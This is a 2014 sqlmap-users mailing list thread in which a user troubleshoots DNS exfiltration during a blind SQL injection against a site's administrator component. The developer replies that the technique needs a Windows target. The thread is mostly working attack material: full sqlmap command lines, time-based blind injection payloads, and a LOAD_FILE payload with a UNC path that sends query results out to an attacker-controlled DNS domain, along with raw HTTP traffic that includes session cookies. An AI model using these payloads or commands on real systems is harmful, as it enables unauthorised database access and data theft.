Re: [sqlmap-users] Problem with dns exfiltration

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Hi.

I am pretty sure that you are targeting LAMP server, while DNS exfiltration
against MySQL DBMS works only if the target is a Windows machine (LOAD_FILE
is provided with a SMB path containing attacker's domain (prefixed with SQL
query result as a subdomain) forcing DNS resolution).

Bye
On Jan 23, 2014 7:58 PM, "Chris Clements" <ccl...@ou...> wrote:

> Miroslav,
>
> Thanks for the reply.  I was looking at my tcpdump wrong.  The dns traffic
> I saw was from my sqlmap system itself looking up the target’s dns name,
> not the target (or any other host) querying for records on my domain.
>
> So it seems that the target system isn’t sending dns queries out.
>  Anything else I can try, or am I just stuck with blind extraction here?
>
>
> Here’s my sqlmap run and tcpdump if it helps:
>
>
> sqlmap
> ==================================
> root@Maple ~/s/g/sqlmap# ./sqlmap.py -u "
> https://ato.target.net/administrator/index.php?option=com_mcsearch&templateId=*/&view=searchtemplate"
> --random-agent --risk=3 --level=5 -a --dbms=mysql --threads=1
> --predict-output --dns-domain=mydomain.net -v2 --banner --time-sec=10
>  --tamper=between --load-cookies=/root/cookies.txt
>
>     sqlmap/1.0-dev-ab36e5a - automatic SQL injection and database takeover
> tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 13:07:01
>
> [13:07:01] [DEBUG] cleaning up configuration parameters
> [13:07:01] [INFO] setting up DNS server instance
> [13:07:01] [INFO] loading tamper script 'between'
> [13:07:01] [DEBUG] setting the HTTP timeout
> [13:07:01] [DEBUG] loading random HTTP User-Agent header(s) from file
> '/root/sectools/git/sqlmap/txt/user-agents.txt'
> [13:07:01] [INFO] fetched random HTTP User-Agent header from file
> '/root/sectools/git/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U;
> Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko)
> Chrome/5.0.342.1 Safari/533.2
> [13:07:01] [DEBUG] setting the HTTP method to GET
> [13:07:01] [DEBUG] creating HTTP requests opener object
> [13:07:01] [INFO] loading cookies from '/root/cookies.txt'
> [13:07:01] [DEBUG] forcing back-end DBMS to user defined value
> custom injection marking character ('*') found in option '-u'. Do you want
> to process it? [Y/n/q]
> [13:07:04] [INFO] testing connection to the target URL
> [13:07:05] [DEBUG] declared web page charset 'utf-8'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: URI
> Parameter: #1*
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 OR time-based blind
>     Payload:
> https://ato.target.net:443/administrator/index.php?option=com_mcsearch&templateId=-5154OR 7979=SLEEP(10)-- MarC/&view=searchtemplate
>     Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
> ---
> [13:07:05] [WARNING] changes made by tampering scripts are not included in
> shown payload content(s)
> [13:07:05] [INFO] testing MySQL
> [13:07:06] [WARNING] reflective value(s) found and filtering out
> [13:07:06] [WARNING] time-based comparison needs larger statistical model.
> Making a few dummy requests, please wait..
> [13:07:38] [INFO] confirming MySQL
> [13:07:38] [WARNING] it is very important not to stress the network
> adapter's bandwidth during usage of time-based payloads
> [13:08:20] [INFO] the back-end DBMS is MySQL
> [13:08:20] [INFO] fetching banner
> [13:08:20] [INFO] testing for data retrieval through DNS channel
> [13:08:20] [DEBUG] performed 1 queries in 0.88 seconds
> [13:08:20] [ERROR] data retrieval through DNS channel failed. Turning off
> DNS exfiltration support
> [13:08:20] [INFO] retrieved: 5.0.95-log
> [13:18:53] [DEBUG] performed 69 queries in 633.52 seconds
> web application technology: Apache
> back-end DBMS: MySQL >= 5.0.0
> banner:    '5.0.95-log'
> ==================================
>
>
>
> tcpdump
> ==================================
> root@Maple ~# tcpdump -nvvi eth0 port 53
> tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size
> 65535 bytes
> 12:35:44.667201 IP (tos 0x0, ttl 64, id 22920, offset 0, flags [DF], proto
> UDP (17), length 66)
>     <sqlmap machine>.52795 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0xa7a3!]
> 61116+ A? ato.target.net. (38)
> 12:35:44.667229 IP (tos 0x0, ttl 64, id 22921, offset 0, flags [DF], proto
> UDP (17), length 66)
>     <sqlmap machine>.52795 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0x37e7!]
> 24158+ AAAA? ato.target.net. (38)
> 12:35:44.710564 IP (tos 0x0, ttl 45, id 824, offset 0, flags [none], proto
> UDP (17), length 151)
>     8.8.8.8.53 > <sqlmap machine>.52795: [udp sum ok] 24158 q: AAAA?
> ato.target.net. 0/1/0 ns: target.net. SOA ns-xxxx.awsdns-29.org.
> awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 (123)
> 12:35:44.711455 IP (tos 0x0, ttl 45, id 22553, offset 0, flags [none],
> proto UDP (17), length 82)
>     8.8.8.8.53 > <sqlmap machine>.52795: [udp sum ok] 61116 q: A?
> ato.target.net. 1/0/0 ato.target.net. A XXX.XXX.XXX.172 (54)
> 12:35:44.716854 IP (tos 0x0, ttl 64, id 22922, offset 0, flags [DF], proto
> UDP (17), length 66)
>     <sqlmap machine>.58257 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0xa3b7!]
> 56658+ A? ato.target.net. (38)
> 12:35:44.716880 IP (tos 0x0, ttl 64, id 22923, offset 0, flags [DF], proto
> UDP (17), length 66)
>     <sqlmap machine>.58257 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0x6497!]
> 7256+ AAAA? ato.target.net. (38)
> 12:35:44.747848 IP (tos 0x0, ttl 45, id 22554, offset 0, flags [none],
> proto UDP (17), length 151)
>     8.8.8.8.53 > <sqlmap machine>.58257: [udp sum ok] 7256 q: AAAA?
> ato.target.net. 0/1/0 ns: target.net. SOA ns-xxxx.awsdns-29.org.
> awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 (123)
> 12:35:44.763158 IP (tos 0x0, ttl 45, id 49299, offset 0, flags [none],
> proto UDP (17), length 82)
>     8.8.8.8.53 > <sqlmap machine>.58257: [udp sum ok] 56658 q: A?
> ato.target.net. 1/0/0 ato.target.net. A XXX.XXX.XXX.172 (54)
> ==================================
>
>
>
> Chris
>
>
> On Jan 23, 2014, at 1:42 AM, Miroslav Stampar <mir...@gm...>
> wrote:
>
> Hi Chris.
>
> It looks quite right. It would be tremendously helpful if you could send a
> console output and a tcpdump (you can limit to only port 53) for a
> following run:
>
> sudo python sqlmap.py -u "...." --flush-session --banner --dns-domain="..."
>
> From your given description it looks like everything should be up and
> running.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Thu, Jan 23, 2014 at 12:46 AM, Chris Clements <ccl...@ou...>wrote:
>
>> Hey all,
>>
>> I’ve got a blind sqli that I’m exploiting with the latest sqlmap commit
>> and am trying to get dns exfil to work, but am not having any luck.
>>
>> I start sqlmap as root with the —dns-domain option set to a domain that I
>> control and have the sqlmap machine set as the authoritative NS for.
>>  Running with a -v6, this is the info I get:
>>
>> ===============================================
>> [18:22:18] [INFO] testing for data retrieval through DNS channel
>> [18:22:18] [PAYLOAD] -2931 OR 7252=IF((ORD(MID((SELECT
>> LOAD_FILE(CONCAT(0x5c5c5c5c4d776a2e,(SELECT HEX(MID((IFNULL(CAST(8315 AS
>> CHAR),0x20)),1,31))),0x2e79564e2e73656375726566696c652e6e65745c5c7456414c))),6,1))>953),SLEEP(5),7252)--
>> PyBa
>> [18:22:18] [TRAFFIC OUT] HTTP request [#3]:
>> GET
>> /administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate
>> HTTP/1.1
>> Accept-language: en-us,en;q=0.5
>> Accept-encoding: gzip,deflate
>> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> User-agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1)
>> Gecko/2008071719 Firefox/3.0.1
>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>>
>> Pragma: no-cache
>> Cache-control: no-cache,no-store
>> Cookie:
>> Login=1;activeProfile=16469185;serviceID=1320;91370904fbecd1edf649755d657f5d32=97t8br06sreu9r846bai0t2pj0;mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec
>> Connection: close
>>
>> [18:22:19] [TRAFFIC IN] HTTP response [#3] (200 OK):
>> Content-length: 8627
>> Content-encoding: gzip
>> Set-cookie: serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT;
>> path=/; httponly, serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT;
>> path=/; httponly, mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec;
>> expires=Thu, 22-Jan-2015 23:22:20 GMT; path=/; httponly
>> Expires: Mon, 1 Jan 2001 00:00:00 GMT
>> Vary: Accept-Encoding
>> Uri:
>> https://target.net:443/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate<https://target.net/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate>
>> Server: Apache
>> Last-modified: Wed, 22 Jan 2014 23:22:20 GMT
>> Connection: close
>> Pragma: no-cache
>> Cache-control: post-check=0, pre-check=0
>> Date: Wed, 22 Jan 2014 23:22:20 GMT
>> P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
>> Content-type: text/html; charset=utf-8
>>
>> [18:22:19] [DEBUG] performed 1 queries in 0.51 seconds
>> [18:22:19] [ERROR] data retrieval through DNS channel failed. Turning off
>> DNS exfiltration support
>> ===============================================
>>
>> If I run a tcpdump on the sqlmap machine, I see dns requests come in for “
>> target.net” and if I do manual dns queries to the domain I own, sqlmap
>> responds as expected with localhost.domain.com.
>>
>>
>> Any idea?  Am I doing anything wrong?
>>
>>
>> Chris
>>
>>
>>
>> ------------------------------------------------------------------------------
>> CenturyLink Cloud: The Leader in Enterprise Cloud Services.
>> Learn Why More Businesses Are Choosing CenturyLink Cloud For
>> Critical Workloads, Development Environments & Everything In Between.
>> Get a Quote or Start a Free Trial Today.
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
>